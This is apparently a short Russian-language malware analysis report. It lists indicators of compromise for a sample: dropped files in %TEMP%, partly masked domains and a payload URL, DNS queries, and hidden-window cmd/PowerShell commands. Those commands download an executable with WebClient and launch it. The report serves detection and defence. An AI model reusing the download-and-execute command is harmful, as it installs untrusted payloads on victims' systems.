Техническая информация
- $okqlaxrdyrx как %temp%\qrjcmek.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function hpvwiof3([String] $Okqlaxrdyrx){(New-Object System.Net.WebClient).DownloadFile($Okqlaxrdyrx,''%TEMP%\qrjcmek.exe'');Start-Process ''%TEMP%\qrjcmek.exe'';}t...
- %TEMP%\tecxopjcbaw5.bat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- 'sw######mmars.vonmammen.org':80
- http://sw######mmars.vonmammen.org/dump/surarsors.png
- DNS ASK we###opnumij.nl
- DNS ASK sw######mmars.vonmammen.org
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tecxopjcbaw5.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function hpvwiof3([String] $Okqlaxrdyrx){(New-Object System.Net.WebClient).DownloadFile($Okqlaxrdyrx,''%TEMP%\qrjcmek.exe'');Start-Process ''%TEMP%\qrjcmek.exe'';}t... (со скрытым окном)